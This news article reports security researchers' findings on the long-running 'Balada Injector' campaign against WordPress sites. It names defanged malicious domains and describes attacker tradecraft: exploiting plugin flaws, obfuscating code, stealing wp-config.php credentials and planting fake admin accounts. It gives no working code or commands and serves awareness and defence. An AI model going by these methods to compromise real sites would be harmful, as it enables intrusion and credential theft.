An estimated one million WordPress websites have been infected over the past six years in a long-lasting malicious campaign that researchers are calling "Balada Injector.”
The ongoing campaign exploits "all known and recently discovered theme and plugin vulnerabilities" to inject a Linux backdoor on WordPress sites, according to website security company Sucuri, which operates as a separate business unit within GoDaddy. This method allowed for various levels of access, and in many cases, the vulnerabilities exploited allowed an attacker to obtain critical information on the compromised websites.
Since 2017, the campaign has continuously ranked in the top three of infections that Sucuri detects and cleans from affected sites. The campaign initiates fresh waves of attacks every few weeks, using newly registered domains and variations of previously-used malware. The most recent wave of attacks were observed just a few days ago when the campaign exploited a high-severity vulnerability in WordPress's Elementor Pro, a plugin used by 11 million websites.
Denis Sinegubko, a senior malware researcher at GoDaddy, said the campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of newly-registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites, including fake tech support, fraudulent lottery wins, and push notifications scams.
The reach and scope of the malicious activity
“In 2022 alone, our external website scanner SiteCheck detected this malware over 141,000 times, with more than 67% of websites with blocklisted resources loading scripts from known Balada Injector domains,” Sinegubko wrote late last week. “We currently have more than 100 signatures covering both front-end and back-end variations of the malware injected into server files and WordPress databases.”
The actors use the period between each wave to develop new attack routines, usually by gathering and testing new vulnerabilities. Each wave uses a new, freshly registered domain name that combine random English words together, such as sometimesfree[.]biz, and destinyfernandi[.]com.
Over just the past year, Balada Injector has used over a hundred different domain names and leveraged a wide range of attack methods, including siteurl hacks, HTML injections, database injections, and arbitrary file injections, with attacks often involving multiple infections on the same site. In an example presented by Sinegubko, Sucuri found that a page (URLScan.io.cache) was attacked 311 times by 11 distinct malicious Balada scripts.
"The entire time, Balada Injector has been quickly adding newly disclosed vulnerabilities (and sometimes undisclosed 0-days), occasionally starting massive waves of infections within a few hours after vulnerability disclosed," Sinegubko wrote.
"Older vulnerabilities were not immediately discarded after initial rounds of infections and some of them remained in use for a long time after the patches were released."
Post-infection activity
Balada's scripts aim to steal database credentials in wp-config.php files, something that could allow continued access even if the site owner patches previously exploited vulnerabilities and removes the backdoor files. To evade detection, the attackers frequently altered the list of targeted files, adding "new elements" while removing "underperforming ones."
"If the site is not compromised yet, they[the attackers] use various tricks to obtain contents of wp-config.php. And if it's already compromised, they read it to save the credentials for future uses," Sinegubko explained.
Additionally, the campaign attempts to gain access to arbitrary site files, including backup archives, databases, access logs, debug info, while hunting for tools like Adminer and phpMyAdmin.
The malware eventually led to the generation of fake WordPress admin users, stealing data from underlying hosts and leaving backdoors for continued access.